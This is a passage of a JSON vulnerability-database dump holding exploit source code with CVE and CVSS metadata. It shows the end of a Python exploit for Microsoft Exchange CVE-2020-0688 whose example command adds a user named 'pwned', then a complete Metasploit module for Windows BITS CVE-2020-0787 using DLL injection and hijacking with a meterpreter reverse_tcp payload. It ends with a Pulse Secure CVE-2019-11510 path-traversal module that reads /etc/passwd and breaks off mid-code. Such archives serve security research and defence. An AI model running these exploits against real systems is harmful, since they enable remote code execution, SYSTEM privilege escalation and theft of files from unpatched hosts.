args.command == '': \nprint('[!] Example usage: ') \nprint(' ' + sys.argv[0] + ' -t https://owa.contoso.com -u joe -c \"net user pwned pwned /add\"') \nelse: \nif args.password == '': sPassword = getpass.getpass('[*] Please enter the password: ') \nelse: sPassword = args.password \nctx = ssl.create_default_context() \nctx.check_hostname = False \nctx.verify_mode = ssl.CERT_NONE \noCookjar = cookielib.CookieJar() \n#oProxy = urllib2.ProxyHandler({'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'}) \n#oOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar),oProxy) \noOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar)) \nsSessionId, sTarget, sViewState = verifyLogin(args.target, args.username, sPassword, oOpener, oCookjar) \nans = raw_input('[+] All looks OK, ready to send exploit (' + args.command + ')? [Y/n]: ') \nif ans.lower() == 'n': exit(0) \nsPayLoad = getYsoserialPayload(args.command, sSessionId) \nprint('[+] Got Payload: ' + sPayLoad) \nsURL = sTarget + 'ecp/default.aspx?__VIEWSTATEGENERATOR=' + sViewState + '&__VIEWSTATE=' + urllib.quote_plus(sPayLoad) \nprint(' Sending now ...') \ntry: oOpener.open(urllib2.Request(sURL, headers={'User-Agent':'Python'})) \nexcept urllib2.HTTPError, e: \nif e.code == '500': print('[+] This probably worked (Error Code 500 received)') \n \nif __name__ == \"__main__\": \nmain() \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/156592/msexchange2019-exec.txt", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-06-12T01:33:20", "description": "", "cvss3": {}, "published": "2020-06-11T00:00:00", "type": "packetstorm", "title": "Background Intelligent Transfer Service Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-0688", "CVE-2020-0787"], "modified": "2020-06-11T00:00:00", "id": "PACKETSTORM:158056", "href": "https://packetstormsecurity.com/files/158056/Background-Intelligent-Transfer-Service-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \ninclude Msf::Post::Windows::Priv \ninclude Msf::Exploit::EXE # Needed for generate_payload_dll \ninclude Msf::Post::Windows::FileSystem \ninclude Msf::Post::Windows::ReflectiveDLLInjection \ninclude Msf::Exploit::FileDropper \ninclude Msf::Post::File \ninclude Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability', \n'Description' => %q{ \nThis module exploits CVE-2020-0787, an arbitrary file move vulnerability in outdated versions of the \nBackground Intelligent Transfer Service (BITS), to overwrite C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll \nwith a malicious DLL containing the attacker's payload. \n \nTo achieve code execution as the SYSTEM user, the Update Session Orchestrator service is then started, which \nwill result in the malicious WindowsCoreDeviceInfo.dll being run with SYSTEM privileges due to a DLL hijacking \nissue within the Update Session Orchestrator Service. \n \nNote that presently this module only works on Windows 10 and Windows Server 2016 and later as the \nUpdate Session Orchestrator Service was only introduced in Windows 10. Note that only Windows 10 has been tested, \nso your mileage may vary on Windows Server 2016 and later. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'itm4n', # PoC \n'gwillcox-r7' # msf module \n], \n'Platform' => ['win'], \n'SessionTypes' => ['meterpreter'], \n'Privileged' => true, \n'Arch' => [ARCH_X86, ARCH_X64], \n'Targets' => \n[ \n[ 'Windows DLL Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => '2020-03-10', \n'References' => \n[ \n['CVE', '2020-0787'], \n['URL', 'https://itm4n.github.io/cve-2020-0787-windows-bits-eop/'], \n['URL', 'https://github.com/itm4n/BitsArbitraryFileMove'], \n['URL', 'https://attackerkb.com/assessments/e61cfec0-d766-4e7e-89f7-5aad2460afb8'], \n['URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html'], \n['URL', 'https://itm4n.github.io/usodllloader-part1/'], \n['URL', 'https://itm4n.github.io/usodllloader-part2/'], \n], \n'Notes' => \n{ \n'SideEffects' => [ ARTIFACTS_ON_DISK ], \n'Reliability' => [ REPEATABLE_SESSION ], \n'Stability' => [ CRASH_SAFE ] \n}, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', \n'WfsDelay' => 900 \n} \n) \n) \n \nregister_options([ \nOptBool.new('OVERWRITE_DLL', [true, 'Overwrite WindowsCoreDeviceInfo.dll if it exists (false by default).', false]), \nOptInt.new('JOB_WAIT_TIME', [true, 'Time to wait for the BITS job to complete before starting the USO service to execute the uploaded payload, in seconds', 20]) \n]) \nend \n \ndef target_not_presently_supported \nprint_warning('This target is not presently supported by this exploit. Support may be added in the future!') \nprint_warning('Attempts to exploit this target with this module WILL NOT WORK!') \nend \n \ndef check \nsysinfo_value = sysinfo['OS'] \n \nif sysinfo_value !~ /windows/i \n# Non-Windows systems are definitely not affected. \nreturn CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!') \nend \n \n# XXX Using session.shell_command_token over cmd_exec() here as @wvu-r7 noticed cmd_exec() was broken under some situations. \nbuild_num_raw = session.shell_command_token('cmd.exe /c ver') \nbuild_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/) \nif build_num.nil? \nprint_error(\"Couldn't retrieve the target's build number!\") \nelse \nbuild_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/)[0] \nprint_status(\"Target's build number: #{build_num}\") \nend \n \n# see https://docs.microsoft.com/en-us/windows/release-information/ \nunless sysinfo_value =~ /(7|8|8\\.1|10|2008|2012|2016|2019|1803|1903)/ \nreturn CheckCode::Safe('Target is not running a vulnerable version of Windows!') \nend \n \nbuild_num_gemversion = Gem::Version.new(build_num) \n \n# Build numbers taken from https://www.qualys.com/research/security-alerts/2020-03-10/microsoft/ \nif (build_num_gemversion >= Gem::Version.new('10.0.18363.0')) && (build_num_gemversion < Gem::Version.new('10.0.18363.719')) # Windows 10 v1909 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.18362.0')) && (build_num_gemversion < Gem::Version.new('10.0.18362.719')) # Windows 10 v1903 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.17763.0')) && (build_num_gemversion < Gem::Version.new('10.0.17763.1098')) # Windows 10 v1809 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.17134.0')) && (build_num_gemversion < Gem::Version.new('10.0.17134.1365')) # Windows 10 v1803 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.16299.0')) && (build_num_gemversion < Gem::Version.new('10.0.16299.1747')) # Windows 10 v1709 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.15063.0')) && (build_num_gemversion < Gem::Version.new('10.0.15063.2313')) # Windows 10 v1703 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.14393.0')) && (build_num_gemversion < Gem::Version.new('10.0.14393.3564')) # Windows 10 v1607 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.10586.0')) && (build_num_gemversion < Gem::Version.new('10.0.10586.9999999')) # Windows 10 v1511 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.10240.0')) && (build_num_gemversion < Gem::Version.new('10.0.10240.18519')) # Windows 10 v1507 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('6.3.9600.0')) && (build_num_gemversion < Gem::Version.new('6.3.9600.19665')) # Windows 8.1/Windows Server 2012 R2 \ntarget_not_presently_supported \nreturn CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('6.2.9200.0')) && (build_num_gemversion < Gem::Version.new('6.2.9200.23009')) # Windows 8/Windows Server 2012 \ntarget_not_presently_supported \nreturn CheckCode::AppearsAppears('Vulnerable Windows 8/Windows Server 2012 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('6.1.7600.0')) && (build_num_gemversion < Gem::Version.new('6.1.7601.24549')) # Windows 7/Windows Server 2008 R2 \ntarget_not_presently_supported \nreturn CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('6.0.6001.0')) && (build_num_gemversion < Gem::Version.new('6.0.6003.20749')) # Windows Server 2008/Windows Server 2008 SP2 \ntarget_not_presently_supported \nreturn CheckCode::Appears('Windows Server 2008/Windows Server 2008 SP2 build detected!') \nelse \nreturn CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!') \nend \nend \n \ndef check_target_is_running_supported_windows_version \nif sysinfo['OS'].match('Windows').nil? \nfail_with(Failure::NotVulnerable, 'Target is not running Windows!') \nelsif sysinfo['OS'].match('Windows 10').nil? && sysinfo['OS'].match('Windows Server 2016').nil? && sysinfo['OS'].match('Windows Server 2019').nil? \nfail_with(Failure::BadConfig, 'Target is running Windows, its not a version this module supports! Bailing...') \nend \nend \n \ndef check_target_and_payload_match_and_supported(client_arch) \nif (client_arch != ARCH_X64) && (client_arch != ARCH_X86) \nfail_with(Failure::BadConfig, 'This exploit currently only supports x86 and x64 targets!') \nend \npayload_arch = payload.arch.first # TODO: Add missing documentation for payload.arch, @wvu used this first but it is not documented anywhere. \nif (payload_arch != ARCH_X64) && (payload_arch != ARCH_X86) \nfail_with(Failure::BadConfig, \"Unsupported payload architecture (#{payload_arch})\") # Unsupported architecture, so return an error. \nend \nif ((client_arch == ARCH_X64) && (payload_arch != ARCH_X64)) || ((client_arch == ARCH_X86) && (payload_arch != ARCH_X86)) \nfail_with(Failure::BadConfig, \"Payload architecture (#{payload_arch}) doesn't match the architecture of the target (#{client_arch})!\") \nend \nend \n \ndef check_windowscoredeviceinfo_dll_exists_on_target \n# Taken from bwatters-r7's cve-2020-0688_service_tracing.rb code. \n# \n# We are going to overwrite the WindowsCoreDeviceInfo.dll DLL as part of our exploit. \n# The second part of this exploit will trigger a Update Session to be created so that this DLL \n# is loaded, which will result in arbitrary code execution as SYSTEM. \n# \n# To prevent any errors, we will first check that this file doesn't exist and ask the user if they are sure \n# that they want to overwrite the file. \nwin_dir = session.sys.config.getenv('windir') \nnormal_target_payload_pathname = \"#{win_dir}\\\\System32\\\\WindowsCoreDeviceInfo.dll\" \nwow64_target_payload_pathname = \"#{win_dir}\\\\Sysnative\\\\WindowsCoreDeviceInfo.dll\" \nwow64_existing_file = \"#{win_dir}\\\\Sysnative\\\\win32k.sys\" \nif file?(wow64_existing_file) \nif file?(wow64_target_payload_pathname) \nprint_warning(\"#{wow64_target_payload_pathname} already exists\") \nprint_warning('If it is in use, the overwrite will fail') \nunless datastore['OVERWRITE_DLL'] \nprint_error('Change OVERWRITE_DLL option to true if you would like to proceed.') \nfail_with(Failure::BadConfig, \"#{wow64_target_payload_pathname} already exists and OVERWRITE_DLL option is false\") \nend \nend \ntarget_payload_pathname = wow64_target_payload_pathname \nelsif file?(normal_target_payload_pathname) \nprint_warning(\"#{normal_target_payload_pathname} already exists\") \nprint_warning('If it is in use, the overwrite will fail') \nunless datastore['OVERWRITE_DLL'] \nprint_error('Change OVERWRITE_DLL option to true if you would like to proceed.') \nfail_with(Failure::BadConfig, \"#{normal_target_payload_pathname} already exists and OVERWRITE_DLL option is false\") \nend \ntarget_payload_pathname = normal_target_payload_pathname \nend \ntarget_payload_pathname \nend \n \ndef launch_background_injectable_notepad \nprint_status('Launching notepad to host the exploit...') \nnotepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true) \nprocess = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) \nprint_good(\"Process #{process.pid} launched.\") \nprocess \nrescue Rex::Post::Meterpreter::RequestError \n# Sandboxes could not allow to create a new process \n# stdapi_sys_process_execute: Operation failed: Access is denied. \nprint_error('Operation failed. Trying to elevate the current process...') \nprocess = client.sys.process.open \nprocess \nend \n \ndef exploit \n# NOTE: Automatic check is implemented by the AutoCheck mixin \nsuper \n \n# Step 1: Check target environment is correct. \nprint_status('Step #1: Checking target environment...') \nif is_system? \nfail_with(Failure::None, 'Session is already elevated') \nend \nclient_arch = sysinfo['Architecture'] \ncheck_target_is_running_supported_windows_version \ncheck_target_and_payload_match_and_supported(client_arch) \ncheck_windowscoredeviceinfo_dll_exists_on_target \n \n# Step 2: Generate the malicious DLL and upload it to a temp location. \nprint_status('Step #2: Generating the malicious DLL...') \npath = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787') \ndatastore['EXE::Path'] = path \nif client_arch =~ /x86/i \ndatastore['EXE::Template'] = ::File.join(path, 'template_x86_windows.dll') \nlibrary_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787', 'CVE-2020-0787.x86.dll') \nlibrary_path = ::File.expand_path(library_path) \nelsif client_arch =~ /x64/i \ndatastore['EXE::Template'] = ::File.join(path, 'template_x64_windows.dll') \nlibrary_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787', 'CVE-2020-0787.x64.dll') \nlibrary_path = ::File.expand_path(library_path) \nend \n \npayload_dll = generate_payload_dll \nprint_status(\"Payload DLL is #{payload_dll.length} bytes long\") \ntemp_directory = session.sys.config.getenv('%TEMP%') \nmalicious_dll_location = \"#{temp_directory}\\\\\" + Rex::Text.rand_text_alpha(6..13) + '.dll' \nwrite_file(malicious_dll_location, payload_dll) \nregister_file_for_cleanup(malicious_dll_location) \n \n# Step 3: Load the main DLL that will trigger the exploit and conduct the arbitrary file copy. \nprint_status('Step #3: Loading the exploit DLL to run the main exploit...') \nprocess = launch_background_injectable_notepad \n \nprint_status(\"Injecting DLL into #{process.pid}...\") \nexploit_mem, offset = inject_dll_into_process(process, library_path) \n \ndll_info_parameter = malicious_dll_location.to_s \npayload_mem = inject_into_process(process, dll_info_parameter) \n \n# invoke the exploit, passing in the address of the payload that \n# we want invoked on successful exploitation. \nprint_status('DLL injected. Executing injected DLL...') \nprocess.thread.create(exploit_mem + offset, payload_mem) \n \nprint_status(\"Sleeping for #{datastore['JOB_WAIT_TIME']} seconds to allow the exploit to run...\") \nsleep datastore['JOB_WAIT_TIME'] \n \nregister_file_for_cleanup('C:\\\\Windows\\\\System32\\\\WindowsCoreDeviceInfo.dll') # Register this file for cleanup so that if we fail, then the file is cleaned up. \n# Normally we can't delete this file though as there will be a SYSTEM service that has a handle to this file. \n \nprint_status(\"Starting the interactive scan job...\") \n# Step 4: Execute `usoclient StartInteractiveScan` to trigger the payload \n# XXX Using session.shell_command_token over cmd_exec() here as @wvu-r7 noticed cmd_exec() was broken under some situations. \nsession.shell_command_token('usoclient StartInteractiveScan') \n \nprint_status(\"Enjoy the shell!\") \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/158056/cve_2020_0787_bits_arbitrary_file_move.rb.txt", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:44", "description": "\nPulse Secure 8.1R15.18.28.39.0 SSL VPN - Arbitrary File Disclosure (Metasploit)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-08-21T00:00:00", "title": "Pulse Secure 8.1R15.18.28.39.0 SSL VPN - Arbitrary File Disclosure (Metasploit)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2019-08-21T00:00:00", "id": "EXPLOITPACK:23F64F82AC4F6039E4EBCB303C604A42", "href": "", "sourceData": "# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit)\n# Google Dork: inurl:/dana-na/ filetype:cgi\n# Date: 8/20/2019\n# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera\n# Vendor Homepage: https://pulsesecure.net\n# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4\n# Tested on: Linux\n# CVE : CVE-2019-11510 \nrequire 'msf/core'\nclass MetasploitModule < Msf::Auxiliary\n\tinclude Msf::Exploit::Remote::HttpClient\n\tinclude Msf::Post::File\n\tdef initialize(info = {})\n\t\tsuper(update_info(info,\n\t\t\t'Name' => 'Pulse Secure - System file leak',\n\t\t\t'Description' => %q{\n\t\t\t\tPulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.\n This exploit reads /etc/passwd as a proof of concept\n This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4\n\t\t\t},\n\t\t\t'References' =>\n\t\t\t [\n\t\t\t [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ]\n\t\t\t ],\n\t\t\t'Author' => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ],\n\t\t\t'License' => MSF_LICENSE,\n\t\t\t 'DefaultOptions' =>\n\t\t {\n\t\t 'RPORT' => 443,\n\t\t 'SSL' => true\n\t\t },\n\t\t\t))\n\n\tend\n\n\n\tdef run()\n\t\tprint_good(\"Checking target...\")\n\t\tres = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342)\n\n\t\tif res && res.code == 200\n\t\t\tprint_good(\"Target is Vulnerable!\")\n\t\t\tdata = res.body\n\t\t\tcurrent_host = datastore['RHOST']\n\t\t\tfilename = \"msf_sslwebsession_\"+current_host+\".bin\"\n\t\t\tFile.delete(filename) if File.exist?(filename)\n\t\t\tfile_local_write(filename, data)\n\t\t\tprint_good(\"Parsing file.......\")\n\t\t\tparse()\n\t\telse\n\t\t\tif(res && res.code == 404)\n\t\t\t\tprint_error(\"Target not Vulnerable\")\n\t\t\telse\n\t\t\t\tprint_error(\"Ooof, try again...\")\n\t\t\tend\n\t\tend\n\tend\n\tdef parse()\n\t\tcurrent_host = data